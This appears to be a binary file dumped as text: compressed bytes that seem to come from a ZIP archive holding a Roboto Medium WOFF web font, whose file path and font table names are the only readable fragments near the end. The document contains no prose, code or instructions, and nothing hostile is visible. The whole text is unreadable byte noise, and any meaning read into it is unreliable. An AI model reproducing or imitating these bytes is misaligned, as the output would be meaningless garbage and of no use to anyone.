'[/:I��$�x|L�stj�H�q�	�}��څ��8��AtL�A�+�uȨ6�E���X]]Xw	:�-��¾�ŐQp�<�D��-(�ˍKp&ϊM��'0���Sw�x��_�T%��hjR��WH|���֛Q�>"ƂB^q������F'r����D8����r�C2"��_5�}_*ѷ�9ݖez�(�:]�=Zo?�k�}Un�^���ás����
.���N_�)&��q<N7:�y��lq�c*C�;����:=y�~0�̿jM���M��[�b�H-˴y��ƫ�q��ǹj�SP mW-�����(F��q���n������x��5��R�܉-�L
G�����.1j�5�1+�9b�o��j��C�4M4��"8�7�ںJ�Ǹ���Om/�GQv?�Ԉ��l�x����6:	d�by�љR�2���›Q�[=8���!z�5X娅H�%E�e�����
*FSQݣsL�d�������HI�gb�!+�V��vȖ_��������=gL�s�_�NM����X�:�j�>N��-�3}H=��86b)�>��Hz4���0-$��6@8$����o�-�X��+��;L���+�ma_���~"a)�f
%X�$扃,��Y�J�C�qi���߱m]V�	F��`�<�^\��ͥ�Z)L��*��s�`@A��!:�+j5\��tᆄʋ���cX��iog�a�8Z4v'f�;n�R�]�����vАİ����N���Z���e@�>H���:�c�t��<+��Åس���uͽ(я���Ή�^3`밹�r���
*�*������j��C׈ӛ�I�ɮ%�w��/���~����A�Z7�x<u�;/!���xzx����,�tn!��0Fe+N
BU�/UQ[ I*H��~�AV}	�A:���
9��Zշv��ٍ]�q�\��ʝw���P���ZX�{\��Fv��&�&��Y�<��f��Oᣘc^��MD����E�*�g���#I�����F%�$�H�,�^�l�LC.9�th����S�v�s�!؉\�x�L�-I@"����Z�R�lY�f������
�e��d�nl�k�'t��2g�[��H�}oȘ��~�(��X2=���0Ƕ��G���=�'�yO��dD���1i��a��z����� ��\�i[�nJ�i�:N��$�"Ô�,ug%�+r�Ĺ퐜�mL�@NT��!�P��U���!��^3`>Zh`�<
P�b|NT��H�A�s(s���/�Hљ tp��E��z-�V�4XG���a~wf�t,4A��PVT1h�u�G$�1��_�_�| }�^�n�j�6ώ���m�8��<g�>�
�k#|����!��q���H�=��W�l�c�"7�F��`\ad��8�z����K|��S!K�9��،Ι
Na����ŒBF
0��jt�$�BPH^�������2GFh�Y.	����+t�5A�	hPR�删1�I�����؊��v
����զe[
�ZW�=":k׬��o�	Ӹ�3�s����.W���Һ��������_��UG�8���}��g����E<x402jP�
!kq^�7P��o���~���XچR�_K�v��SY)fw��n%Ǭ3?b�|BԦ>���D�p4�c��,��*�(��P����!�k���񩡂�z�4��H���{�e��LȕV�S�B&��h��Z��Bî���I��`���Pv��9�
�-�#b�N��´�>!@e����Jm+l��<G2�c.	z�BC�7/ڍ(�[��%�\��V������dsຬ�)Ln����dm���_�4+Q����Bɛ�u*����<��l�ܫ	3V���^�U�Cn��=:�H�1~��2$�xh���-K�j�/���Q�*/�]�0�Njև�n3��-�|��[V�e���1����0a��x?+�*ecz�}/��kl����ێd�T~�ŀ�E	�GT��Y�R:�ހ�OAKB�1�I�����ބ܌�<����@u{�),CC���쇱�x>2�<w��Ő�łVly�E���)�3��1ń�,�
NO�����q�� `xr�qn���9�]ɱ$'	��g��<0�/�t���S=-�8�R> ��.<����1
�{갆�]�4��y\�q4=��{"�AS�獵N��P��B2F׵P����2>��[%z�hW%��nFM�]p��ږP�X�5�o�F��LX��r�l*�7����x�n�^X��&���BͤS���m9�`�b�f��9�szsS�`��\�k��GМV�$��'0`�BȎ�(���(�r�I�%>z`���Y3$£��� %Q6j�$�S�%�����оcFY��n�)}�C��@�Q��>�{rM�Yx9��N�GK��W��J�lI�	�r��c��)ط�G����.)".ѯr��9,P���t�G7�1�BF��π���>v��sIƅ�`5����<#cݚGq2QC�����<�VDߕ(}Ѡ���\�f�iBԥ��JC8bce�l�X�	��靎�p�q AR0�Vl
��L�G� ;����H�)�<>�zH�:��fz���}�"|-NM���r١]}�3��I�f�\\��Z9�7�=K��2<\i��Ts�ؤxp�s�u5�\�#T>��v �T,x�i�2H}��޽cX=[��lU=�TC(/U���
0�f�ǭ��a�tM�a
N>\t3�1��ٌ��.�3����L���XU���=�k�pW��>IA��Y{��>R˾Hs��
��0��",ኁ�C�;��Μ���tBG2�:VVF
+>�k�7�y�a�����C��\��D�,-O��W�B�ҟ�^�+��['}�d�j�'����91��o/��k�~YShT���&����K�x�K�Oń=�­��3a��	T�mMLIJ2��Vz�r	B���F�`�~%�4�3p�Z�FL�|#��i�J
:%=coҧ�#�O�y�
�G)�2SXed�l�>���҈9�J�#o�W~�58�=#���H��֦ф3��5&-����E�u>�!�;Bis���E����n������u3㜛t�]��<}�<��
^�h���*�/w�O�����3�2)��l���}D�n����;�OaU%�w�ٌ/�@^����]J�;���Z�/�y+��{�39+��п�~�Zb$M�,�p�f����d���ylP(�8�((����/fq��g�
�A'�@9N�F���=���3����9�E�w͠�*�%���f�1J��J�3v�Fx`bi��mk'�vЬ��(��^���Ϊ<�r3�x���=T��|����������-�m����Mj]M�Om�	����8t���0
�}5��L
IrU-׹�JF�d.�ʜ���:�/#nD=��o[.c�Eae���<�
�y����x-<�&� |��%�+@�_�ׂu:H> T)Vi�e��h���e/L���V���~"�}����%����Xc�*e3�G����	]��9ʭ:wG-��
B5(�@�^��3ᨐ�5�����"���$㊶��3<�-/
�|��8�=u������wH-&�}�iS	!����UkjȐ�BEՉ'r�h��-��;�!^|+���
��>b�r�e��0�UV_G����^Jڙ��:e����G��){Jp:cן2�������E�Ni�~����+�����X)q�9%���]ˊM�k��U��mb�f"Uݩ߁�k�:���#�
��x�Y�YM�
�T<�Yw�N��0�lD�
 }�0����SaBFK���#bdfz@�1B+�侃�V�Sv��VǗi����b�2g���0 �Z�
�7}��_9딜�YqN�|�{$�C@�(���ѳ�޶f��h�F x	p
�R
}`֤�"��g��l�ٓ���ۧ�(r����Z���b{i��m�>}�L�=��G`pTg�sk0��a0h�v�co���>R�6��݅��3>��M�#�6D����08��V��_�K\�E#`Q�F�ڮ�ɶ��@�r�.���+�5�y��HY �WM����E~(�`;{F����	�{E,����Χ�H�����F���{5\6ª���#�4P<�������P��GX�[�!�ɍ������OT^�m�抁������$��’"4��ȏ������ĥA��7�CneE1��DT���ƶ]�`MR_�[�»��#>��.{����z�#�y|�	�%�U#�=!z�'h~⌹%4�N���RY�Z]��{��t��&�C�s�]����
��eh'9A�Z)�k�ڢ����O��Y.���&�C�6�3ʸ�}=(���ɚ���*D�`���R�
�w��ڇ���xJ�x��8��ڛG�W��j��Â��D��H�L�1�,�²#d��|?E3V�?��h��	}��|΋�6�r���k�C[�49��OX��G���[�Dx��n����KE+5��փh1K�2�Kr>�cT ����T�
�$+�
����P"Uƚ"��:^�qu�3��.�^��[��3��7N��!�~���8�	u8�����I<y��o��
2���"�	��ɑ;��i+_&
�h�l2x�0�P	Ϥ�DM\����vd�>�sSo)*
�T�8��3:�@T�}�9�<�N�@:�t�9��ʣ9JQ�}h6u����K��`��ƣ��;���3���P�4ę.�J�U�:��P N+�A<�*��pۼK�k�U��|��FA[0)F_�fG8����RX5&ZY&Ze:�`i\�A�� *���N�Ͱ�WN>R
<��ב�q�0U;�8

b�X���&#
@��߲X�
�l?�!���w�ħ��IF�6Ժ��̽�]ܭH�V?�ss&�p$=�3��`ؐɒX�K��`T�:�^�#��w�Ӛr �b���I�S���T_��oHbd�3jp�-���t8j����x9'�X�Z't~|��w���A=~�cx��;�=�>x�k_�z�0)��|6�2-�`�Ǽ]!
Ip��������&�K���Hz�5K����ȷ=e����
1f��J`�Cb� ���U|�w�
̗F*��4ֺi��O�>��R�����'��2��q��Ϧ
-l��%W!!��s�lt-�7����ft��ո�x4ަ�-:2fw�kAZc��>D�h����D��
iu$�K�q7Y!��f��Q4b֐M��l<�$0v�CU��{v�:�K@����!��{�{��!�K$��+*>WӀ��d��$�M�h�`z;��@�.z�/�|2s���e3=v��UfT���Ȼ�������5�2xl@�o.��y_/�� ��;���'ӬH��x�LW��:v�
�cL^�Л��m���#�/o=�ܮ
Y�Y@�^�C��[RU���}��ewtͻ��3EM�O]��d��:B��#�/��&��+.K�R��̵�V�;�Y�g��ūlK�va�ЕnS$Ȣy\��5�2V2�'���BՄ��ƚ�(�b��m"[�wֆ���QK�ͭ���Oy5d���˶��L�)�ew�V�bT��OX�}J`�ʽ�����{}<&���J[/X�/�o(�!�f����1��OP��1f�E�(Ët8MA3�QU��߭R���)���0�s���2��%�$�Q4K_L�&�A5Xr%(�=�ʹ�;���G8�:�;�Oҋ�A�h�<���H����_D��D����O7g2K�g��>�ɕp�wH����q?G6w���]le����?XDbCgO��	�K��a7|�#��v��=��„3��ir�lk &rK��y5���*�ݦ�N�YQ��n���iO5
��
Ut R�D�\5wc��r��ZQ����l��qTly��jkKT���xvb�A�����I�����p3r�Z�V�(4���g&�&6��w�@�pG��'�p��~��L���u���`�=���{�(G%(	�7ח�1�=�da���vd_�?���!i�'���q�[��.^�‘d�9W���#B
��T�(W1{�q1R׬�S�+���.<s ���/\��ck�]��5�"��F�&峃{�Q�i�n�!R3^,�:´=F��C���t���Nro)F���<�EN䎜�볇�쿯|1��^�#�#��|��.�,�k@���ܣ�M\�ĥ㒺��?�p���Q�c����-_,+�YN�4!�.�T��󁯡�A�0�ib]-�w�&�Do��ԛ�Nʂ�<�P%�����0&8u�!���?�If+Q�p+�:����PӲ������2�LQ�V$(�uX�U�	�
�d�ܣyAD��s��]�0��AA�oE$l�}���ܿ�=���6ia%�/�w�֫��ARÂ��7v��
��
�����[�����s�uz��:���<�0��;eq1�0
��I��)ع�{�sq��`5u5jv����J�*0QP��Hc�W�-��}�3n�Z��c[نp��/u�X�X�c�u��8G΄�s��J���2�w:ٸmPSs�a�\�
��_W�e#SǷ]^���1&��L��u�YzCЦ�K�O�i�N��E��>��V|�w���Lye#�#L��Y>^2J�l‚K9WH��`AX�-%仚�;#�0�T�0�Jڐ1��Ǣ�*\
Y��P- "=&=�{��1��(��"u�/�Yi�C��@n������it��$��b0�ⓈBY0B�i��}Üb�B%a]!��(��aA��2�Uk��-RB���,	I��3c�+h|�}�+DH4�_r��P4T�蕐#���ا�8����w&ȁPXb���+8���)���Bp8{y�l�臀��I��X��d��`'%�zV,�/�W�~�~䕺v�u���*ו��l�U�&���=ҹb��5��F7�HO�Ԥ�y�%SA�l�)��O�� >>ޯ��Fﴸl�����a@v=�BPo�莎���'c �\�S�X�<����trq�򋟏��!;T[�^�E/���]��!4�~�&I�0�Z0��f53�0c������@�^i{�l�M�|;���o����x���#���uyP��H-z�ݞ�/�_*<�T�cIn��2��)f0�=�6�n@�����I��Q��=B=��a_X���*����Q�V"Q9�bJ3dH��*���Q��,�M���Kۙč���1����d�	V��R�!��(Z��G��&�a�[�������3q��)��\^!
�bq�M�5���dE��p����[,:�<����9j^� ��m��yqx�J0��y���m����E�\X�\�-w�
�Ru��8�gw�j�WT�7.z��ڮ�^]��v���X�S�>����T��t 0u[wu��[F�]&J�ֳ+#�x���.L�v\�ꐝx��UW�V�+6<P�
r	h�/�:�0�����2_��~;y=�c�#���"�c��s��o�"��ͷ��1��z�^�:6p��'S؅���%ҶB����C�N�d*;�,��T@��]L�yۣp���7|uk�:���qQ��U���ʬq�t�tb�,�l����5_~9�B�M�M��o�W���}��|����q�v*/����cW�(��K�BW\ܫ�.��:�ݭL)�I����;��~�W���n�����P4
K}p�
}��!�t����h���\^��77V&<C�m�_����'8�a��}���KQq!m�C?\*A�G��L-�)IQ���+ʆD���]I�T�(�{T�=������B�v�a�9���i�sd)��:#��v��b�".�2,�ߢŁ*�IYc{�
��LW[�S��6�;�u�~��jJo�VM��6��ʅ�m����HH���Æ�B�7��S(���%<O��y�hY��,�V��\���BL��\����W���P� 3��~K��s�yg�
���.�RN/��7{��
��K�ኈ�|��E�ƹ�}#��	P�N���c�;7������چ�u����[f���ڜ�7S2l�1͖�c� ���?[�m1ī��q o�|2XfBr$�!A(���4sg�N��X*��������a��X�/�'�������8y2Wo�ѤM�JN̎f>�=xB���\����s��V+���%��c{�3ҁ��C�rCr��U�X+z��)�#��k����O�%���Q��A�%�8��
�]��.��-�D-�6�}9�S$^���9O����	��$������󖠼��/�ÀF�;����U�+�PH�iE-�Z�<M"�=Y�//v'L5S�Q�ۘ��f	S��W�l>ǏV���R��]�����j�^RQ}�7wB
��=�OB�.��\�����,�8���}?��C�����u�����\�����V�g�A������Mb�%�v��B�\�+=I�����U#k����ڡ��H(X�v͊N̈�[��?�����6�PP%���՜B����l@"�����)<F	~!�T�gO�$C�JH��
������t]p�g��a=��Y
}n����	ާ��@|�Y1��EuR�m����4�𪱱b�yp�R��e	zs�b}�*u2�PIÖ#A%�,���D�2���?v�Vٵ9�l'�ׅ ޻��5)\��!oJ��Ü�fɦ����-�}��
����
SrM2�W��P��w	0*����ɬˁ�F�>����ڤ����Rd�)$��[jum��`p�d��t ������+w����������r�=d��񏲹����i�Tr�'o3�(9���^��8�~�����O�PE��h5�6�p]��ę
<i��e�� ))"�,!��8\�Q��q�	��Z0D��/H��3,@S�4�֫!��zm�h����E�ӀŰ�ƞ�C���c�M'ٻ���W�ss1I��<��Ǒ��%F]���i�����*7Y�5c���v�a�D�G[���Cɛ��=�Y«DM���w�7
)Z�UA3����o�Ca[Y�U�6'�>9/�	���MvW�j����.�3��"�f����D��n̓	��ʀ&@*�������Qm���H��0��˯���R�I8e"�XN�s0ބ
/)�-%Rw�
I1�-�����ҀMR-�)�ߺ�'���6\�aQ�"�����nF����B�����R��֋�_a�?rpK݂�7F����/I �E�`sW �4V�1`���A���u�ч�l}�6�^oU�x�^_�N�5���@Xq�|t�i�l��˧n�
Z�&K�iI��qX�x��LV�)������(���7Z=�S,���0��I�!p�KÎ�nj�D=��zA�"m�M2�C�tl�>=�Ca�Ec*mw���mq}7�a鮩��T��qJ�G"�T�~�RQ�
P�p���� ʄ����P�iQ�t-U�8!�q�0�H���L�n�P\�g�Y��[),(-�biwA7���6��oYk�s�����P����)�/���3��Vm�ʣ�@ePJ2N�^�����r0����
8�m�u>��Bzd`8#»��=���`9)�-;��/o�7\<��c0�Ҁ����B�`�������f3������ԕ�<�ѾJ�[���iAz��]�\�u����녣�e�8T��x�A�_c)1c�Ue��Q�G�r���J�t�	���
�U��p�K��'���FFLcXCQ�lj���U4:�ڼ/�%*
-��N	�?�'�+�`"�-�XY
v�M�~b��G��j���4��d��G�x�H�(����iC�
߇M��Ro+��Y��M�q�8U������xG\��=^Q�]	�0��¦Q����i
Y�LA�lj���Xx�,7d�~р�&��t�w�Z��D��[M�KϜ}WI��{}��E�xL��9�H`)}� ��GS�4�)��j�dGn�� 쮫0�W���w�%�:�+m5���5��U��Eڦ�G��V
�)�m�C��ډ�ev{���ys�ò �^�aɆ������g�$�,�U�b�+����"�T��>x�
��
�m�6{�	�Mi]��R7���bt�vS(��?b*V���m�z �ᢐ&�ՖŸ�η�"��2J��lO��
�t<��@9���kE�����-(�r�>z2�_�����i,0Nl�S�E�ϣ��@c�90_��*�
�� ���;z |1�i	� �1A>5[�i��b|���!-�
�]дQm���<��L��gj/�m6����bo����L�b�:N�Zõ{��G,�Y�i|4K�����&��S��9ǯ0W�
�
����\�f��4��
N��.	�q�E��S����t�._��dt��	9ai����[�g	�]������{��6mr�N������r�eV�V��L��ڰ+��L�蓍�#MsJ���[�̀ϧ�Ș?�9�G����Z�4�2GQ��6�)�~��-��J��)��]�A�>�m�����E%8?����Ps<�Mvݞ��.𰰟Yv����PqMl�t���ն��a6	vՒ����k
Ö)v������cVU��r���
���Cd
7�Ѻ����P�1uz���
�L�)�����P5��7ZE�b�+�j��zP� Oa
Ow���������_��J֦OV��3��$�4t�t��A����?����`�7J���|论!R�6��Vw�:�ض�Öh<�Kq�E9Q���@10����e���@k	������8=�_+�������9~��A�o��vn�-��4I��ǨCC\[�Ĭ&"f�`{�l���$/�V�y�g/�Ӻ���Q\�5��bx��N1YS���𨘐هӘ�Gґ��Ϯ�h�h��H�g�F�ϸn �����ّ��-ߥ���8�4�L�H��^K&Ȧ?�����'�Տ�\�,�O0��\� ߝG;����a�֥H7���.S���y���!�t�?_�X6'(HD�����I��S��d����Pdh�W�V�T=��'�%��a�-7�-��%��Kئk5�%}�m�3��3�9,�HRq����5X*p�m�G#�sP��%�H׭rH��u��Jw�*��0�)��k�*��9��A+��h�U�VӚD��>��m���ͩR���$�E�I���L-zd?̴?[	�&�ۦ��H��a�8��w�l��:7 ���DZj)�v5��BO�g"�1��U�/A��
v�υ�;���J*�K���]N$��a��+����8�X�I�� ��d�qq%��x(���
mM.��1�G�"��������!0��;�Ǥ�����d-PıOI%��� 9�bw|'Y�	'�q���4��ҙ���+��e�����x.:��x�Y��1�V�aH3ץ��WR8��{^C=�.ۜ���`���<�WP���j,����A�����0c�����U�{�� �x��'�1IQc2o�,���jw��I��S��}?祖����nx���Èl��ա�z�pE����]F�� �wAE��RL��Oc��21{��SV��R����]�?dv��nС�` �=f�����P�������ô9�atԡ<`�>sy��a�-�m���c�\�a�a�2��CE���R6�ϦN�-ڤ�3Y�m���2�ɜ�f��|w��#A���I��og);��̯{�t����̴+�k4Џ���af(98�*<�p^R�]�&<2l��,�Fyc)��k�E����0����q���,2�ݕ��h���ɟ�pE�
�V�?��[l��:a&eJ:ߴ;s�{m���V����[�Z�.B��<�I�����#��~��Hb���
fL�܁Q��h1�+�r������TƤ�����:g:dؐ�P�o׺W'�ßM-4#�5��EV�-Q�H�I|�X�4����`�S���6&����y�&�?Ua�����|���1��,8��^���a����Z����	H�$z���zh��>�ͽ��Hj��%z���6����͆l��V�p�@ c���D�nrh��LHA�aa�k:W�l���j���cZ���ve��6hTD�ou��DL׿\��ݐ����py����z���ڹ�<�<��1I�H1I=�|q��$G=�@�lMf�,��9k��E�<
�Λ�t��S���e?<8��z91����Ji>;�m»̨NLN=%�촏~��4�Muw�
uQ��i<���=�׸z��e�O�x>���݄4�����Ǒ|W�F�C���A��y�e�z��'y�?�(�y��m�Le�E�E��֔=�o�E�㔯���H�!X��5�0Sn�ܓYJ_p�
\nU�赌���x���Q�T;@�E���S������,�(�CBH�ou�ur�d!�'��l�K��u�N��m���a~�q7z��6���ާ�NdF9�:o������@X���u���3�*�4��p(\��ۂa1�R+G�,��q�n���B�`f��"m�V�4�J��OTs�#s��(Y���:�\va[
`��(%K�db�"�S�w2�y�f�ahm�m���]��4�,Y�\ޑ�����C�s�ᐛ2R�O�)߿��~�n�7�JKvBg\%�y��y���:����}AĜL�'ϐ�e�Rb��7�z#�R���r� ŋ�����z�z�'�܁ŕ�4r@�?,���B��
�\���E�����D��S��n<@��?^����/vO��Ɯ��4+��{�f�;��ǀ���k��wCo;g��*!*I'͉1
�o����rۊ�9%�Ⱥ��T�#+��%:��:�|���I���x�]r^���u���c��
��ds��-XDU�c��`"����{�(~���h��f��/�h�Iu�
W�n���ij
f<�N�B�+�V�#.��DZB�
&�}�D�%���jur�;H<1��c��Lu5[(>��F�e�α�<v����=�΋S��;�m:ͳ}�$��J�-'���j�z��66_(�\�ݒ�(B�U��n�lYd.���=�N�H���hO������6n���q�J�\
���^2��z�y.����t�jq���h<*"���%���p��>[� ���~�ʗ�����$���i��)�z�o����$|.�zkeȵ�Dj�HZ�dC�[��ى���z�z^���8Z�8��[��RU����A�+Jm�S<�G�YϢ�L�'��6Yg�M�~>|q�/EkM��E�p6ܲ���HR�N-,8XSx�M�x�[���šru��������~�/��,�lG>�7>8�Q��XM��0��j�~p;�h�F
�$c�+Ր���s.I��r��{�ϖ�hg	g��֏��qU��;���wٽ8��
nj�[f��Gīs��?^;�r���� -�
�A����\E�� �v���S����ߚa��|	���с @���]�j���U���z��2�
�w1	�S����Au8�����O���/u=ٝXGÌ��̄��~iֲn]�U,.��	3�&�s/0;�c%��
$V�܃������"��ͬ7]��Bk'�77�$�e��l��X��~�rm�#Z8�:|��b��ܧ��7ujH�D��m4�4�ak�8�ߞJ���D�[MZ"eO�_`�h���@��t{��@�8�������O!�-Ë	<�������`#Ϗ0���&k,S�hW���
#��V˟"{�L�ɼ�O$��z� (C?���vo7�0�j?�2}�
��2]d@D˜�fUВ�"�ic�R�;��%�Q����Bm�..A�0���2.�*Zweϋ�^%а��D
owj�u>|��!dM	��
����&Ɣ��l�#�u��,��"|�
�xV��WB7w�>
Za��sLF<��>�m,���W�(X�X�-ױ��N
�Ex�L�|%]]��O&��}��=�}vo���dk���B��/7�Zow�͉��8�5����V��ʤӈ�-c�Qٮ[�ʷr!�\,��طA[�ԛ�?��x/��$���'�}�qʾ%g�,���Y;�~;�x���1Zً�=R{�1=�������L�n��=;��K�]>D�����ρ� ������i~}��5+�P��9c�U�H��Q�%gz&y^9Ca�O٤_H޼f�|���ME5�f�.
�,�(��!����c��g�]�+���CE���S�ߐ�VW�f4_���
�Xf�Yi��;lq�pt�:m^�Q[#��xTԅ�~�H�v�z�8��6����T�5J,u��y��8��|��
��T�b,Ѫ�sp��WdH��s�;����3n�T}Dt�yE�$ZGc��LO�!k)b1Q�1AIj/��BH�	�ٛ4�c kl����hBb���'0�������q.�ҵە_�b��ѩ��s�TG�ޯ��Zugh�s#"�51��-p�S���y~nB���3x���l1�ݣf��� N�~���
9��Pt
ٵz#��G�;0��J#Y���i�U��pE�H�y��s���G��w�U�@��$�L��浰q�!lMQ�5�W5�o�v��8��Ębb}w�9ۥ��B�������Y�g8�����#}b��B.%�>�W�mq�/�������5'�&�(]������3jF�����P���1���_�q�(����4Ʌ,�^���{Ry�B�^�)���J"*y�<�Ch\���c�J���j���C�I�;hwa/��j��>��������HΡ
�dޞ�-�����ME!��q 9c9���v/��Vj���{"t��X���Ɨ���Z�J�a��Pߞ)q�|����k�<���O�סm��rͤ�&��~��=��ٛ�7~P��4Ո�؈3=��gq3\�B(�,��@/��Jb�:�d�O^
Y���d�|[��Z�ӻ-���s��ְ�XW�Ib1��qz�~
�WT�{٧�B6���Gt�w
U�͟����1�V\�-T�G>l�L����V;�O+�෕.���J/��J��C���T��R'�!3�ġ(�$��iP��`�B���U�J��FHm��(�"ՠ���$�
=Q� �FQj����M�N���AEIJCa���l#r�P�3x��L2A:��`�:+��h&*
��qkW�0�Q�	HS�:���"N珃NN�=��&J�Xf"I��HmBA��a&<n	1p�k��X���9۷'j*����W�q�H�f%���`&B�<������xħ�_���^@�#�wnB�����ۂ�C��"�/�n��a�����H�G����1�oֱ�̇i���WK����?)�n�S�?��x�:�g+�3>���n�b�_��~!)���?ܧ��7��T�y�у�j���F�ֶpoPK!�Q�a�aBit_sanctum/fonts/roboto_medium_macroman/Roboto-Medium-webfont.woffnu&1i�wOFFa���FFTM�_�[�GDEF�),��GPOS�
�ƃ�GSUBN`&� �OS/2TW`�Z��cmap����B*cvt 
4DD��fpgm
x�eS�/�gasp,glyf4L���T�headX�16n��hheaX�$t<hmtxYo���J�loca[|��nnLmaxp]H  �name]h�[V��|post_���-�prepa�]�y�webfa��rR{�=����.��x�c`d``�b`b`f`dx
�π���9�K �,�S�xڭ�YlUU��si-���P �F���!�2)�2*�ʼn�Q@y L2��R�D)e� 8E�`�R(U*p����;�.�P@�{X{��}���$%���S�{��)�7�����\f
꣟��#ǏU���1F!�!%�xS^�k�N�����Zm��>�J�#o�����y���P�P�P�ЄPv(/���,�_9V���By�Mg?�����XuT�:�quQ}-�`
=a_*ˮj���e�����KĜ\V�0̀�m�ګ���a����'��X��q��d�
'�g2���ip:\��Up5\�a���:�n�a���|�n�;c�
�����Ӿ_�a	���y�@���.MqjO��vV��W;��������+��� �U��v`���pM�X馵�F;�s�3m�)�V�h8
%)�ԡ�2%�JR��p���nj"�d�X̲��[���<�[���3��~�[����%p)\��9��L��Xn��F*�$<O��̘ό�̘ό�̖��>j�����>
��E&f��`���x�����㛏o>�����O�vx����DM�Z��ڨ-5ϐM��.�����K�A�8T�i�&k��j��k�fj�>�g������Z���p���Ņ�y�C񋂕U�^�zL�Ɠ6�Z���c9z�_�9�/?;g��M�=|�_���Ƽ����~�N>@�?��V*��Z�w�K�I��U�_��6.�bV�D{h��eٵ��?m"�BXj�e��ݰ�ܯG���i�cJT�Օz. {V�:[o�v�����l���T;k�6�]�f� ��;�H������3�R�:����;��Q^6���L�ͮN�R��U�j�Yy�{�^��+���Y.u K��oボddʈ�<N��T���Yx��`���#�����=jNU��Ft^�nٲ�9c���Y�jJy̢WȮ�̿�"�U�~����m}T��VQ�?j�.�kݫ���L�C�.�Ae#\�,{��e���x�+�����}\�og�U~�u~�>�|��u���6���$`ُ��[w��w�{ʿ�B~�q��ml5��6TZ!��d�/�Ǿ���)bGn�N�İ37c�n�ء[r�ijѻ
�mA<�u{�� �}�#�z'��Π�x�]A���=��R�D���+z�k��� ̾ߟ��kH�0��a�������	`��e���b-Ó� ��o#�*�v��F���*O����^�̰ϝ~Ыx*�J��*%���9킳\
v����gW(�� �k��p�i�Y��T��TKs��;��E���TKr��@�����8�b�RqN�X�1jj Hq���j
�ja�ZC������g�`ĩ�"qڥ9��v5Pn#��b�jqک=��+W-��AD�A�S0A�u�Q�3���Ltg�rM������N��X� ��O�-n�ۣMp��N��ɚ@��.�>D�
�ٰ{��Oh)�,'�UZ�5�&�\�`�6�f�٢|m%�r�֩��Z���J@x�c`d``�b�c�a`rq�	a��I,�c�b`�3������s2�8@,0f�1E��4�3& ���b�
�x�c`fQg����:�՘��QB3_dHcb``ax���>�A!�T�����x����Kc`�d
V``�����bź��	�~�x�c```f�`F��1��,�����d�2�1�gf�`:�tG�KADAJANAIAMA_�J!^a�����,������[�U͠ � � Um	W�T�����/����W�?8�`��}v?��`Ã����?��)ԅDF6�F& ����uV6vN.n^>~A!aQ1q	I)iY9yE%eU5u
M-m]=}C#cS3sK+k[;{G'gW7wO/o_?�����а�Ȩ�ظ��D������3�-^�d���+W�Z�v��
7oݲm�=���c(JIͼ[�� �IYC�,�b��r��rjV�jL��sk�%5�N?t��[�����p����=g��y��������ľ���̙;���B��* x��u:������������
����������������Dx�]Q�N[A�
��� 9�����{�	�Սbd;��i7r��q@�D
گ���H�!H|B>!3k��4;;�sΙ3Kʑ�w�k�S�$����6�NH�����덌��Zlf��u���є;j�=o)M;�Z����
����;�4���:	�!�qK��ͺ�����b00����.?�R��4�j˰��Ѽ�3��4@Skm���!��qK�˦�6����$���tUS���]���`�*́��Vy&ҷ$�,
�b���
9����@�HƼIJ;ㆵƑ��6O��<�Mmo�Y�w�K:�Ȇ�b;b)�	DBFU��Ͻ,�R��@��������D<��u1Vz~���ˊ�V�΋Bwo�j��)�^ξ���Ac����J��<,�4hCz7z���ꈫ�>�'ӿ�Z��xڽ}`���ܙ�پ�ٞ�M'!Y�MBQ���*���"��A�<E}ϊef�+RD���by��gDE����?�ޙ�&�}��bv'���{�=���x�<�㧚�sg��U�E���b�QU2}�-.�pȩ�6��Y
��'x>&�傰>�����]�L��߷�'��%�{8��lR�uc\Ε�D���x��(���TĨ*8�)�������r���E���1V�rL�������Qa﩮x�ޢ�!�q"g��9��(�X9�X
"�
��
)�������z������3�����Wrh?��/t��8N�֜�e��\<
��Rc�X�ˎ[�8��H��YZ�������9�k}�Pz~0Zg�G�;+?2�G��意��Q�֥��,5խHi���7����{����RZgf�2G�,�f~�,ZK��s��0)U:���ǟGr�R���s%(i�Z>����W	_ᶵ�Tܵ��݋W�u��7}��_�;A����+�f�q��:����,��x^�����-#j22���[���LC�T��y�b��ϣ?y^���y�S�F"zd����:y�#}?{�����>R��ܯMğmھ�������@R�p�N����V�=w/�*E@�>^bB������e �⋩�pZN�Ӳ�
\ZQ\�,`Q.砬��z%˭ʀ|�O;8]W̎}n��E�|��`T-��r;;���v���nJ��95�${��\�|�pP�b�N��E夲�S�~��U��J~_ ��$�?������0��W�x�7���k
WN�>}�����m��&;L�,�|��+�/x���>�4����qyNj�x��w��wyq���z���F�^Ή�Εq]�-\�wiGG}\��!G}]�R�Y�v�C�NeG=Q��.�s1�]n�8a��X�j�V�~+w��ÑZ(�bl�j��~��/͢x����Q��d٣ffU#n�h ������*����%ARp�ϧ>��և��և���.������M�d�÷��}�y��s�8`��'��a���ۗ�=��^c��:�)λ��-�Z���ݰ���=nj�3��1=�����b#�0�U�����Qbd#�����*�Յ
�\�\�R��$� �"j���E�#T�8(&U�^�
�e�C�V*�:kvA;7 IqxԌ��j�'�rz5 � �"M����$G�]�S�E��9�;)�t'�1`��9\�"y��WU��"^`�*������u^����͘0�t,.�{a�=���ŗ�8�cMk�����.�pe�󪋆��?�ܸHs�=C��}u��^����a7����GvN]��GV:����0��Ew�4|2��ޢHBRdy%�.Ɖb2d8����@n�"�;�}C��r�3��4��9/G�+��^����tsU�D�e��4�r�I��lͫ��-�����{��z��p�f��]{̧=�u��|_�ז��]��-T�r�ڝ<r��/��8�<gΓW�ܻ�\�Azj�=+i�M'o�Q>2��yð��k׹�%M�Nם�&��qq%�XT�)x�:�n�:S�s�nq����oYebBA��5�I�7��;�J!y��?v߬>��M��d�����Gi��"�Z�t�B�w�Y,wpv��1�1���S4��v�
� ��(��vPᣪD��[m���_�Y���YKU���0�԰?,����'�i���&�k�k����p'��d6�#H�Jk^��Q�AU�իfWD�oBp�	��?������jo����0�m�}�x���C1�r i^5?[����{����
